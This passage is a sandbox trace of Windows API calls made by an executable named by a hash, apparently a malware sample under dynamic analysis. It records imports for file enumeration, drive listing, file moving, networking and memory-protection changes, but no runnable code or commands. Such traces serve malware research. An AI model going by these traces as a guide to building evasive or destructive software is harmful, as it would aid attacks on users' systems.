GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0036.658] GetVersionExA (in: lpVersionInformation=0x12e1a8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65636f72, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="\no(w") | out: lpVersionInformation=0x12e1a8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0036.658] VirtualAlloc (lpAddress=0x0, dwSize=0x4a800, flAllocationType=0x1000, flProtect=0x4) returned 0x1d0000 [0036.665] VirtualProtect (in: lpAddress=0x400000, dwSize=0x50000, flNewProtect=0x40, lpflOldProtect=0x12f234 | out: lpflOldProtect=0x12f234*=0x2) returned 1 [0036.826] VirtualFree (lpAddress=0x1d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.829] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76910000 [0036.829] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0036.829] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0036.829] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0036.829] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0036.829] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0036.829] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0036.829] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0036.829] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesExW") returned 0x7695273d [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalDrives") returned 0x76955986 [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameW") returned 0x769503ff [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="MoveFileW") returned 0x7697548a [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="DecodePointer") returned 0x7728cd10 [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="WriteConsoleW") returned 0x769582f1 [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="HeapReAlloc") returned 0x7729ff51 [0036.830] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultLCID") returned 0x76966584 [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="HeapSize") returned 0x77289bec [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointerEx") returned 0x7694f5b2 [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="GetConsoleMode") returned 0x76962412 [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="GetConsoleCP") returned 0x76962c8a [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="FlushFileBuffers") returned 0x76947f81 [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="GetStringTypeW") returned 0x769667c8 [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="SetStdHandle") returned 0x7699f589 [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="FreeEnvironmentStringsW") returned 0x76961dc3 [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="GetEnvironmentStringsW") returned 0x76961dbc [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="GetOEMCP") returned 0x76953db9 [0036.831] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="TryEnterCriticalSection") returned 0x772832bc [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="DuplicateHandle") returned 0x7695cdd9 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObjectEx") returned 0x7695bab0 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76963939 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="TlsAlloc") returned 0x769635a1 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0036.832] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="TlsFree") returned 0x769613b8 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimeAsFileTime") returned 0x76962fde [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="SetUnhandledExceptionFilter") returned 0x76963d01 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="IsProcessorFeaturePresent") returned 0x769676b5 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="InitializeSListHead") returned 0x77295eeb [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="CreateTimerQueue") returned 0x769447a6 [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0036.833] GetProcAddress (hModule=0x76910000, lpProcName="SignalObjectAndWait") returned 0x769761d9 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="CreateTimerQueueTimer") returned 0x7694b655 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="ChangeTimerQueueTimer") returned 0x76945a1a [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="DeleteTimerQueueTimer") returned 0x7694b662 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="GetNumaHighestNodeNumber") returned 0x7699dcfa [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessAffinityMask") returned 0x76952351 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadAffinityMask") returned 0x76974136 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="RegisterWaitForSingleObject") returned 0x7694b357 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="UnregisterWait") returned 0x7694b495 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="EncodePointer") returned 0x7728a295 [0036.834] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibraryAndExitThread") returned 0x7694fdb8 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleA") returned 0x7695cf41 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseSemaphore") returned 0x76957267 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedPopEntrySList") returned 0x772868c7 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedPushEntrySList") returned 0x7728994f [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedFlushSList") returned 0x77283129 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="QueryDepthSList") returned 0x77289a38 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="UnregisterWaitEx") returned 0x76945a02 [0036.835] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleExW") returned 0x76953e39 [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="LCMapStringW") returned 0x769613d0 [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessHeap") returned 0x76961280 [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="GetFileType") returned 0x769675a5 [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileExW") returned 0x7696764b [0036.836] GetProcAddress (hModule=0x76910000, lpProcName="IsValidCodePage") returned 0x7696c1c0 [0036.836] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76b40000 [0036.837] GetProcAddress (hModule=0x76b40000, lpProcName="SystemParametersInfoW") returned 0x76b4e09a [0036.837] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x769f0000 [0037.988] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameW") returned 0x76a0157a [0037.988] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75830000 [0041.783] GetProcAddress (hModule=0x75830000, lpProcName="ShellExecuteW") returned 0x75843c71 [0041.784] GetProcAddress (hModule=0x75830000, lpProcName="SHGetFolderPathW") returned 0x758b5708 [0041.784] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0041.784] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77380000 [0042.073] GetProcAddress (hModule=0x77380000, lpProcName=0x17) returned 0x77383eb8 [0042.073] GetProcAddress (hModule=0x77380000, lpProcName=0xb) returned 0x7738311b [0042.074] GetProcAddress (hModule=0x77380000, lpProcName=0x73) returned 0x77383ab2 [0042.074] GetProcAddress (hModule=0x77380000, lpProcName=0x3) returned 0x77383918 [0042.074] GetProcAddress (hModule=0x77380000, lpProcName=0x74) returned 0x77383c5f [0042.074] GetProcAddress (hModule=0x77380000, lpProcName=0x9) returned 0x77382d8b [0042.074] GetProcAddress (hModule=0x77380000, lpProcName=0x14) returned 0x773834b5 [0042.074] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x748d0000 [0042.175] GetProcAddress (hModule=0x748d0000, lpProcName="GetFileVersionInfoW") returned 0x748d19f4 [0042.175] GetProcAddress (hModule=0x748d0000, lpProcName="VerQueryValueW") returned 0x748d1b51 [0042.175] GetProcAddress (hModule=0x748d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x748d19d9 [0042.175] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x6f920000 [0042.681] GetProcAddress (hModule=0x6f920000, lpProcName="atexit") returned 0x6f93c544 [0042.681] atexit (param_1=0x252137) returned 0 [0042.681] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f234 | out: lpSystemTimeAsFileTime=0x12f234*(dwLowDateTime=0x5dc796f0, dwHighDateTime=0x1d433a9)) [0042.681] GetCurrentThreadId () returned 0xa48 [0042.681] GetCurrentProcessId () returned 0xa44 [0042.681] QueryPerformanceCounter (in: lpPerformanceCount=0x12f22c | out: lpPerformanceCount=0x12f22c*=12218203855) returned 1 [0042.681] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0042.681] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0042.681] GetLastError () returned 0x57 [0042.681] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0042.681] GetLastError () returned 0x57 [0042.681] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76910000 [0042.682] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x76963879 [0042.682] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0042.682] GetLastError () returned 0x57 [0042.682] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0042.682] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0042.682] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0042.682] GetLastError () returned 0x57 [0042.682] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x71f10000 [0042.710] GetProcAddress (hModule=0x71f10000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0042.710] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0042.710] GetLastError () returned 0x57 [0042.710] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0042.714] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0042.714] GetLastError () returned 0x57 [0042.714] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76910000 [0042.714] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0042.714] GetLastError () returned 0x57 [0042.714] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0042.714] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0042.714] SetLastError (dwErrCode=0x57) [0042.716] GetStartupInfoW (in: lpStartupInfo=0x12f168 | out: lpStartupInfo=0x12f168*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x424e00, hStdOutput=0x8407f7a4, hStdError=0xfffffffe)) [0042.716] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0042.716] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0042.716] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0042.716] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe\" " [0042.716] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe\" " [0042.716] GetLastError () returned 0x57 [0042.716] SetLastError (dwErrCode=0x57) [0042.716] GetLastError () returned 0x57 [0042.716] SetLastError (dwErrCode=0x57) [0042.716] GetACP () returned 0x4e4 [0042.716] IsValidCodePage (CodePage=0x4e4) returned 1 [0042.716] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f198 | out: lpCPInfo=0x12f198) returned 1 [0042.726] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12ea60 | out: lpCPInfo=0x12ea60) returned 1 [0042.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f074, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0042.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f074, cbMultiByte=256, lpWideCharStr=0x12e7f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0042.726] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12ea74 | out: lpCharType=0x12ea74) returned 1 [0042.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f074, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0042.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f074, cbMultiByte=256, lpWideCharStr=0x12e7a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0042.726] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0042.726] GetLastError () returned 0x57 [0042.726] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0042.727] GetProcAddress (hModule=0x76910000, lpProcName="LCMapStringEx") returned 0x7699f72b [0042.727] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0042.727] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x12e598, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0042.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x12ef74, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\